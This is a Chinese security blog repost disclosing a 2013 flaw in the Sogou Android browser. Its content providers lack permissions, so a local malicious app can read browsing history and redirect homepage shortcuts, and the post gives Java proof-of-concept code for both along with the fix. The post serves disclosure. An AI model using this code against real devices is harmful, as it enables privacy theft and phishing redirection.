记录黑客技术中优秀的内容,传播黑客文化,分享黑客技术精华

搜狗手机浏览器隐私泄露和主页篡改漏洞二合一(需要手机里有恶意应用)

2013-12-27 11:00
搜狗手机浏览器存在漏洞,恶意攻击者利用本地的恶意app盗取用户的浏览记录隐私,修改浏览器主页为任意的钓鱼网站。
 
漏洞原因:
 
几个重要的content provider都没做任何权限限制。
 
攻击代码:
 
 
 

Uri contentUri2 = Uri.parse("content://sogou.mobile.explorer/quicklaunch");

Cursor c = getContentResolver().query(contentUri1, null, null, null, null);

String xc ="";

if (c.moveToFirst()) {

for (int i = 0; i < c.getCount(); i++) {

c.moveToPosition(i);

String title = c.getString(1);

String url = c.getString(2);

xc=xc + title + ":" + url + "\r\n";

}

}



ContentValues test = new ContentValues();

test.put("url", "http://www.qq.com");

int xxx = getContentResolver().update(contentUri2,test,"_id=?",new String[]{"1"});

 

 
 
 
我没有打开草榴 - -!!!
 
点击SOHU,打开的是QQ.com,如果是钓鱼呢 - -!!
 
 
 


修复方案:
对content provider做权限限制

知识来源: www.2cto.com/Article/201312/268093.html

阅读:106647 | 评论:0 | 标签:漏洞

想收藏或者和大家分享这篇好文章→复制链接地址

“搜狗手机浏览器隐私泄露和主页篡改漏洞二合一(需要手机里有恶意应用)”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

ADS

标签云